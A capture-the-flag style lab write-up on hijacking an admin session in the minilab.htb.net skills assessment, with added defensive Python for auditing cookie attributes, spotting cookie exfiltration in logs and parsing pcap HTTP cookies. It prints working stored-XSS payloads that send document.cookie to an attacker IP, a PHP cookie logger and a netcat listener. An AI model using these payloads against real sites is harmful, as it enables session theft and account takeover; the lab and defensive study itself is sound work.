# Session Security - Skills Assessment

You are currently participating in a bug bounty program.

* The only URL in scope is `http://minilab.htb.net`
* Attacking end-users through client-side attacks is in scope for this particular bug bounty program.
* Test account credentials:
  * Email: heavycat106
  * Password: rocknrol
* Through dirbusting, you identified the following endpoint `http://minilab.htb.net/submit-solution`

Find a way to hijack an admin's session. Once you do that, answer the two questions below.

***

vHosts needed for these questions:

`minilab.htb.net`

* Read the flag residing in the admin's public profile. Answer format: \[string]

In our profile there is a Country input. I put a basic XSS probe into it to see whether it is vulnerable -->

<figure><img src="/files/Qi2J4KPZ1A6JiaWdzS3J" alt=""><figcaption></figcaption></figure>

Then I open the "Share" option and view my public profile -->

<figure><img src="/files/notaHWGSZHTkeV5bZYPn" alt=""><figcaption></figcaption></figure>

Nice! With that I can try to steal the session cookie through this XSS. I put the following payload into "Country" -->

```
<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://10.10.15.232:1234/index.php?c=' + document.cookie;"></video>
```

And craft a web page to receive it -->

First I created the following `index.php`:

```
<?php
// Append whatever arrives in the "c" parameter to a local log file.
$logFile = "cookieLog.txt";
$cookie = $_REQUEST["c"] ?? "";

$handle = fopen($logFile, "a");
fwrite($handle, $cookie . "\n\n");
fclose($handle);

// Send the visitor back to the application afterwards.
header("Location: http://minilab.htb.net/app/");
exit;
?>
```

Then I started a PHP server:

```
php -S 0.0.0.0:1234
```

Now I send the URL to the admin through the `submit-solution` endpoint -->

`http://minilab.htb.net/submit-solution?url=http://10.10.15.232:1234`

<figure><img src="/files/VatnaRw4WZ8UESjXwIc9" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/rLWx3pUEJa2674jlfFnw" alt=""><figcaption></figcaption></figure>

It worked, more or less... so let's try with netcat instead -->

```
sudo nc -nlvp 666
```

```
<h1 onmouseover='document.write(`<img src="http://10.10.15.232:666?cookie=${btoa(document.cookie)}">`)'>test</h1>
```

<figure><img src="/files/Jk5s6negEP58kPtTsiv4" alt=""><figcaption></figcaption></figure>

Nice! Now I send it to the admin -->

`http://minilab.htb.net/submit-solution?url=http://10.10.15.232:666`

<figure><img src="/files/M4dmSQsKgLjP9EmlZmiW" alt=""><figcaption></figcaption></figure>

`http://minilab.htb.net/submit-solution?url=http://minilab.htb.net/profile?email=julie.rogers@example.com`

<figure><img src="/files/rinlMH6tACaSzJoYSi0t" alt=""><figcaption></figcaption></figure>

It works! Knowing this, I bring the PHP HTTP server up again -->

> I'll use the previous PHP method to get the admin cookie, but this time the submitted URL is `http://minilab.htb.net/submit-solution?url=http://minilab.htb.net/profile?email=julie.rogers@example.com`

<figure><img src="/files/PaSpuGpQ42JSqLziJUss" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9pXVVlCSY4PecAuRSOQs" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/JEdS6WoKaHFtingd8xq9" alt=""><figcaption></figcaption></figure>
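From the defender's side, the theft above works only because the session cookie is readable by page script and leaves the browser in an ordinary GET with the cookie in the query string. The following Python is an added example (mine, not part of the original write-up or the lab): `audit_set_cookie` reports which hardening attributes a `Set-Cookie` header lacks (HttpOnly is the one that keeps `document.cookie` from handing the session id to injected script; Secure and SameSite belong to the same checklist), and `find_cookie_exfil` scans access-log lines for the two exfiltration shapes used above, a clear-text `?c=` value and a base64 `?cookie=` value. The cookie names, log lines and session values are constructed.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Cookie names that usually carry a session identifier (constructed list; extend for your app).
SESSION_COOKIE_NAMES = {"PHPSESSID", "session", "sessionid", "JSESSIONID", "auth", "token"}

# Shape of document.cookie output: "name=value" pairs separated by "; ".
COOKIE_STRING_RE = re.compile(r"^[\w.-]+=[^;]*(?:; ?[\w.-]+=[^;]*)*$")

# Request line inside an Apache/nginx combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def audit_set_cookie(header_value: str) -> List[str]:
    """Return the hardening attributes missing from one Set-Cookie header value."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in header_value.split(";")[1:]}
    return [name for name in ("HttpOnly", "Secure", "SameSite") if name.lower() not in attrs]


def _is_cookie_string(value: str) -> bool:
    """True when value looks like document.cookie output containing a session cookie."""
    if not COOKIE_STRING_RE.match(value):
        return False
    names = {pair.split("=", 1)[0].strip() for pair in value.split(";")}
    return bool(names & SESSION_COOKIE_NAMES)


def _decode_base64(value: str) -> Optional[str]:
    """Strictly decode base64 (the btoa() form); None if it is not valid base64 ASCII."""
    try:
        return base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def find_cookie_exfil(log_lines: List[str]) -> List[Tuple[str, str, str]]:
    """Flag requests whose query string carries a cookie string, clear-text or base64.

    Returns (parameter name, recovered cookie string, encoding) per hit.
    """
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            if _is_cookie_string(value):
                hits.append((param, value, "plain"))
                continue
            decoded = _decode_base64(value)
            if decoded is not None and _is_cookie_string(decoded):
                hits.append((param, decoded, "base64"))
    return hits


# Constructed access-log lines (not real traffic): a normal visit, the two exfil shapes
# used in the write-up, and a harmless base64 parameter that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /app/ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /profile?email=julie.rogers@example.com HTTP/1.1" 200 2048',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?c=PHPSESSID=s3cr3t HTTP/1.1" 302 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?cookie=UEhQU0VTU0lEPXMzY3IzdA== HTTP/1.1" 200 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /search?q=aGVsbG8= HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    print("missing on weak cookie:", audit_set_cookie("PHPSESSID=abc; Path=/"))
    for param, cookie, enc in find_cookie_exfil(SAMPLE_LOG):
        print(f"cookie exfil via ?{param}= ({enc}): {cookie}")
```

Run over real logs, `find_cookie_exfil` is most useful on an egress proxy or on the web server that hosts the vulnerable profile page, since the victim's browser is what issues the outbound request; the `Set-Cookie` audit is the quicker fix to apply first.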

***

* Go through the PCAP file residing in the admin's public profile and identify the flag. Answer format: FLAG{string}

Now, in the admin's profile, I can see a PCAP file. I download it and open it with Wireshark -->

<figure><img src="/files/xooo5AadAIbRRIzHozat" alt=""><figcaption></figcaption></figure>

Now I filter the capture for "http" -->

<figure><img src="/files/YzStkzuBwWxNUDRxcFY1" alt=""><figcaption></figcaption></figure>
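To go through a capture like this without a GUI, here is an added Python example (mine, not the lab's or the author's) that walks a classic pcap file using only the standard library, pulls out TCP payloads, and lists every HTTP message carrying a `Cookie` or `Set-Cookie` header, which is what a session id travelling over plain HTTP looks like on the wire. The capture it parses is constructed in memory (addresses, ports and the cookie value are made up); to run it on a real file, pass `open("capture.pcap", "rb").read()` instead of `build_sample_pcap()`. It handles the classic pcap format with Ethernet/IPv4 framing only, not pcapng, so Wireshark's `http` filter stays the quick route for anything else.

```python
import socket
import struct
from typing import Iterator, List, Tuple

HTTP_METHODS = (b"GET ", b"POST ", b"PUT ", b"DELETE ", b"HEAD ", b"OPTIONS ")


def iter_tcp_payloads(pcap: bytes) -> Iterator[Tuple[str, int, str, int, bytes]]:
    """Yield (src, sport, dst, dport, payload) for every TCP segment carrying data
    in a classic (non-pcapng) capture with Ethernet/IPv4 framing."""
    magic = struct.unpack_from("<I", pcap, 0)[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack_from(endian + "I", pcap, 20)[0] != 1:
        raise ValueError("only Ethernet (link type 1) is handled here")
    offset = 24  # end of the 24-byte global header
    while offset + 16 <= len(pcap):
        incl_len = struct.unpack_from(endian + "IIII", pcap, offset)[2]
        offset += 16
        frame = pcap[offset:offset + incl_len]
        offset += incl_len
        # EtherType 0x0800 at bytes 12-13, IPv4 header from byte 14, protocol byte at 23.
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue
        ihl = (frame[14] & 0x0F) * 4
        ip_total_len = struct.unpack_from("!H", frame, 16)[0]
        src, dst = socket.inet_ntoa(frame[26:30]), socket.inet_ntoa(frame[30:34])
        tcp = 14 + ihl
        sport, dport = struct.unpack_from("!HH", frame, tcp)
        data_offset = (frame[tcp + 12] >> 4) * 4
        payload = frame[tcp + data_offset:14 + ip_total_len]
        if payload:
            yield src, sport, dst, dport, payload


def extract_http_cookies(pcap: bytes) -> List[Tuple[str, str, str]]:
    """Return (flow, request/status line, header value) for each HTTP message that
    carries a Cookie or Set-Cookie header, i.e. every session id sent in the clear."""
    findings = []
    for src, sport, dst, dport, payload in iter_tcp_payloads(pcap):
        if not (payload.startswith(HTTP_METHODS) or payload.startswith(b"HTTP/")):
            continue  # TLS or other non-HTTP data
        head = payload.partition(b"\r\n\r\n")[0].split(b"\r\n")
        first_line = head[0].decode("latin-1")
        for header in head[1:]:
            name, _, value = header.partition(b":")
            if name.strip().lower() in (b"cookie", b"set-cookie"):
                flow = f"{src}:{sport}->{dst}:{dport}"
                findings.append((flow, first_line, value.strip().decode("latin-1")))
    return findings


# --- Constructed sample capture (no real traffic), built in memory so the example runs offline.
def _packet(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    eth = b"\xaa" * 6 + b"\xbb" * 6 + struct.pack("!H", 0x0800)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    frame = eth + ip + tcp + payload
    return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame


def build_sample_pcap() -> bytes:
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    request = (b"GET /profile?email=julie.rogers@example.com HTTP/1.1\r\n"
               b"Host: minilab.htb.net\r\n"
               b"Cookie: PHPSESSID=constructed-session-id\r\n\r\n")
    response = (b"HTTP/1.1 200 OK\r\n"
                b"Set-Cookie: PHPSESSID=constructed-session-id; Path=/\r\n\r\n"
                b"<html>profile</html>")
    tls_like = b"\x16\x03\x01\x00\x05hello"  # not HTTP; must be skipped
    return (header
            + _packet("10.0.0.5", "10.0.0.9", 40000, 80, request)
            + _packet("10.0.0.9", "10.0.0.5", 80, 40000, response)
            + _packet("10.0.0.5", "10.0.0.9", 40001, 443, tls_like))


if __name__ == "__main__":
    for flow, line, cookie in extract_http_cookies(build_sample_pcap()):
        print(f"{flow}  {line}  ->  {cookie}")
```

Each segment is inspected on its own, so an HTTP header block split across several TCP segments would need stream reassembly first; for a short lab capture that is rarely an issue.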

